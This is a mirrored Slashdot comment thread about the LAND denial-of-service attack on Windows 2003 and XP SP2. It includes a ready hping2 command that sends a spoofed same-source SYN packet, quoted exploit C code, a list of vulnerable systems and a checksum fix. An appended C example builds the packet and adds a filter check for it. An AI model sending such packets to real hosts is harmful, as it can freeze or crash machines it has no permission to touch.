Slashdot Mirror


Windows 2003 and XP SP2 Vulnerable To LAND Attack

An anonymous reader writes "Dejan Levaja, a Serbian security engineer, has discovered that nearly 8 years after the attack was first made public, Windows 2003 and Windows XP SP2 are in fact vulnerable to the historic LAND attack." Granted, you need to have the firewall turned off for this to work, but there's a whole lotta machines that don't have it turned on.

10 of 534 comments

  1. Re:Only win ? by redJag · · Score: 5, Informative

    There is a big list before the provided source code.

  2. What is the LAND attack? by fizbin · · Score: 5, Informative
    Quoting from http://www.insecure.org/sploits/land.ip.DOS.html:
    i recently discovered a bug which freezes win95 boxes. here's how
    it works: send a spoofed packet with the SYN flag set from a host, on an open
    port (such as 113 or 139), setting as source the SAME host and port
    (ie: 10.0.0.1:139 to 10.0.0.1:139). this will cause the win95 machine to lock
    up.
    So it's a way to either remotely lock up or reboot a target machine. I would assume (not having, you know, tried it or anything) that this includes most windows-based webservers.
  3. Re:News? by InsaneGeek · · Score: 4, Informative

    The LAND attack requires an open port, so by definition if the system isn't running any services it will have no open ports and not be vulnerable to this attack.

  4. Want to do your own testing? by bluelip · · Score: 4, Informative

    Grab a copy of hping2 and try:

    hping2 aaa.bbb.ccc.ddd -s 135 -p 135 -S -a aaa.bbb.ccc.ddd

    Obviously, replace aaa.bbb.ccc.ddd w/ the ip address of the workstation you'd like to test

    --

    Yep, I never spell check.
    More incorrect spellings can be found he
  5. MOD PARENT UP ! by mirko · · Score: 4, Informative

    BSDI 2.1 (vanilla) IS vulnerable
    BSDI 2.1 (K210-021,K210-022,K210-024) NOT vulnerable
    BSDI 3.0 NOT vulnerable
    Digital UNIX 4.0 NOT vulnerable
    FreeBSD 2.2.2-RELEASE IS vulnerable
    FreeBSD 2.2.5-RELEASE IS vulnerable
    FreeBSD 2.2.5-STABLE IS vulnerable
    FreeBSD 3.0-CURRENT IS vulnerable
    HP-UX 10.20 IS vulnerable
    IRIX 6.2 NOT vulnerable
    Linux 2.0.30 NOT vulnerable
    Linux 2.0.32 NOT vulnerable
    MacOS 8.0 IS vulnerable (TCP/IP stack crashed)
    NetBSD 1.2 IS vulnerable
    NeXTSTEP 3.0 IS vulnerable
    NeXTSTEP 3.1 IS vulnerable
    Novell 4.11 NOT vulnerable
    OpenBSD 2.1 IS vulnerable
    OpenBSD 2.2 (Oct31) NOT vulnerable
    SCO OpenServer 5.0.4 NOT vulnerable
    Solaris 2.5.1 IS vulnerable (conflicting reports)
    SunOS 4.1.4 IS vulnerable
    Windows 95 (vanilla) IS vulnerable
    Windows 95 + Winsock 2 + VIPUPD.EXE IS vulnerable

    --
    Trolling using another account since 2005.
  6. Re:I know its been around, but...Linking to source by __aaijsn7246 · · Score: 4, Informative

    Security through obscurity doesn't work. Here's the important part of the source :) Basically it just sends a SYN packet which has the target's address as the source and the destination (same port as well).

    ---snip---
    /* zero the IP + TCP headers, then fill them in by hand */
    bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
    ipheader->version=4;
    ipheader->ihl=sizeof(struct iphdr)/4;
    ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
    ipheader->id=htons(0xF1C);
    ipheader->ttl=255;
    ipheader->protocol=IP_TCP;
    ipheader->saddr=sin.sin_addr.s_addr;   /* source address == target address */
    ipheader->daddr=sin.sin_addr.s_addr;   /* destination address == target address */

    tcpheader->th_sport=sin.sin_port;      /* source port == target port */
    tcpheader->th_dport=sin.sin_port;
    tcpheader->th_seq=htonl(0xF1C);
    tcpheader->th_flags=TH_SYN;
    tcpheader->th_off=sizeof(struct tcphdr)/4;
    tcpheader->th_win=htons(2048);

    /* TCP checksum covers a pseudo-header (src, dst, protocol, length) plus the TCP header */
    bzero(&pseudoheader,12+sizeof(struct tcphdr));
    pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
    pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
    pseudoheader.protocol=6;
    pseudoheader.length=htons(sizeof(struct tcphdr));
    bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
    tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));
    ---snip---

  7. Re:Can anyone confirm? by bluelip · · Score: 4, Informative

    The problem might be w/ your code.

    A test listed in an above comment of mine worked for my box. DL hping2 and try:

    hping2 aaa.bbb.ccc.ddd -s 135 -p 135 -S -a aaa.bbb.ccc.ddd

    Obviously, replace aaa.bbb.ccc.ddd w/ the ip address of the workstation you'd like to test

    --

    Yep, I never spell check.
    More incorrect spellings can be found he
  8. exploit by imipak · · Score: 4, Informative
    Courtesy of the fine (French) folk at k-otik.org... an exploit.

    Unfortunately the b0rked Slashdot lameness filter won't allow code to be posted even when 'post as code' is selected :?

  9. Re:Only win ? by ip_fired · · Score: 4, Informative

    I found some interesting things while playing around with this.

    1st: The checksum code is always off by 3 in that file. Subtract 3 from the value before you take the complement and it'll be right. (this is a kludge, I haven't taken the time to actually figure out why it's wrong yet)

    2nd: It causes 100% CPU usage on a WinXP SP2 box for about 3 seconds for each packet sent!!!

    3rd: It can be blocked (and probably IS blocked) by most routers since the source and destination addresses are the same.

    I got permission to send one of these packets to my friend's Win2003 box and as far as we can tell, it didn't do anything. I don't know if the packet is getting through though.

    4th: Also, I retested the Mac, and again, the malformed packet did nothing.

    --
    Don't count your messages before they ACK.
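Added example, not part of the thread above and not the k-otik exploit, the snippet in comment 6, or hping2's own code: the C below builds the packet comments 2 and 6 describe (an IPv4 TCP SYN with source address and port equal to destination address and port) into a byte buffer, computes the IP and TCP checksums with a plain RFC 1071 routine (the posted source's checksum is what comment 9 found off by 3), verifies them, and applies the filter rule comment 9 says most routers enforce: drop anything whose source and destination address match. Nothing is put on the wire. The target 10.0.0.1:139 is the constructed value from fizbin's quote; the function names and constants are this example's own.

```c
/* Added example: build a LAND packet into a buffer, checksum it, and run the
 * src==dst filter check. Illustrative code written for this page; it is not
 * the posted exploit. 10.0.0.1:139 in main() is a constructed test value. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IP_HDR_LEN   20
#define TCP_HDR_LEN  20
#define LAND_PKT_LEN (IP_HDR_LEN + TCP_HDR_LEN)
#define PSEUDO_LEN   (12 + TCP_HDR_LEN)   /* TCP pseudo-header + TCP header */

/* Network-order (big-endian) field accessors so the buffer is wire-ready. */
static void     put16(uint8_t *p, uint16_t v) { p[0] = v >> 8; p[1] = v & 0xff; }
static uint16_t get16(const uint8_t *p)       { return (uint16_t)((p[0] << 8) | p[1]); }
static void     put32(uint8_t *p, uint32_t v) { put16(p, v >> 16); put16(p + 2, v & 0xffff); }
static uint32_t get32(const uint8_t *p)       { return ((uint32_t)get16(p) << 16) | get16(p + 2); }

/* RFC 1071 Internet checksum over len bytes. Run over a header that already
 * carries a correct checksum it returns 0, which is how we verify below. */
static uint16_t in_cksum(const uint8_t *data, size_t len)
{
    uint32_t sum = 0;
    for (size_t i = 0; i + 1 < len; i += 2)
        sum += get16(data + i);
    if (len & 1)
        sum += (uint32_t)data[len - 1] << 8;   /* odd trailing byte */
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);    /* fold carries back in */
    return (uint16_t)~sum;
}

/* Pseudo-header (saddr, daddr, zero, proto, TCP length) + TCP header. */
static void tcp_pseudo(uint8_t *ph, const uint8_t *pkt)
{
    memcpy(ph, pkt + 12, 8);                   /* saddr and daddr from IP header */
    ph[8] = 0; ph[9] = 6;                      /* zero byte, IPPROTO_TCP */
    put16(ph + 10, TCP_HDR_LEN);
    memcpy(ph + 12, pkt + IP_HDR_LEN, TCP_HDR_LEN);
}

/* Fill pkt (>= LAND_PKT_LEN bytes) with an IPv4 TCP SYN whose source and
 * destination address and port are identical. Returns bytes written. */
size_t build_land_packet(uint8_t *pkt, uint32_t addr, uint16_t port)
{
    uint8_t *ip = pkt, *tcp = pkt + IP_HDR_LEN, ph[PSEUDO_LEN];
    memset(pkt, 0, LAND_PKT_LEN);
    ip[0] = 0x45;                              /* version 4, IHL 5 words */
    put16(ip + 2, LAND_PKT_LEN);               /* total length */
    put16(ip + 4, 0x0F1C);                     /* id, same constant as the snippet */
    ip[8] = 255;                               /* TTL */
    ip[9] = 6;                                 /* protocol TCP */
    put32(ip + 12, addr);                      /* source address == target */
    put32(ip + 16, addr);                      /* destination address == target */
    put16(tcp + 0, port);                      /* source port == destination port */
    put16(tcp + 2, port);
    put32(tcp + 4, 0x0F1C);                    /* sequence number */
    tcp[12] = (TCP_HDR_LEN / 4) << 4;          /* data offset 5 words */
    tcp[13] = 0x02;                            /* flags: SYN only */
    put16(tcp + 14, 2048);                     /* window */
    tcp_pseudo(ph, pkt);                       /* TCP checksum field still zero here */
    put16(tcp + 16, in_cksum(ph, PSEUDO_LEN));
    put16(ip + 10, in_cksum(ip, IP_HDR_LEN));  /* IP header checksum last */
    return LAND_PKT_LEN;
}

/* 1 if both the IP header checksum and the TCP checksum verify. */
int land_checksums_ok(const uint8_t *pkt, size_t len)
{
    uint8_t ph[PSEUDO_LEN];
    if (len < LAND_PKT_LEN || in_cksum(pkt, IP_HDR_LEN) != 0)
        return 0;
    tcp_pseudo(ph, pkt);
    return in_cksum(ph, PSEUDO_LEN) == 0;
}

/* Filter rule: IPv4 TCP with saddr == daddr and sport == dport. */
int is_land_packet(const uint8_t *pkt, size_t len)
{
    size_t ihl;
    if (len < IP_HDR_LEN || (pkt[0] >> 4) != 4 || pkt[9] != 6)
        return 0;
    ihl = (size_t)(pkt[0] & 0x0f) * 4;
    if (ihl < IP_HDR_LEN || len < ihl + 4)
        return 0;
    return get32(pkt + 12) == get32(pkt + 16) &&
           get16(pkt + ihl) == get16(pkt + ihl + 2);
}

int main(void)
{
    uint8_t pkt[LAND_PKT_LEN];
    size_t n = build_land_packet(pkt, 0x0A000001u, 139);   /* 10.0.0.1:139 -> 10.0.0.1:139 */
    for (size_t i = 0; i < n; i++)
        printf("%02x%s", pkt[i], (i % 16 == 15 || i + 1 == n) ? "\n" : " ");
    printf("checksums ok: %d, matches LAND filter: %d\n",
           land_checksums_ok(pkt, n), is_land_packet(pkt, n));
    return 0;
}
```

Build with `cc -std=c99 -Wall land_example.c`. Putting the bytes on the wire is what the posted exploit and the hping2 line do, via a raw socket with IP_HDRINCL and root; this example stops at the buffer so it runs anywhere. The `is_land_packet` test is the same check a border router or host firewall applies, and the stricter variant, dropping any inbound packet whose source is one of your own addresses, covers it as well.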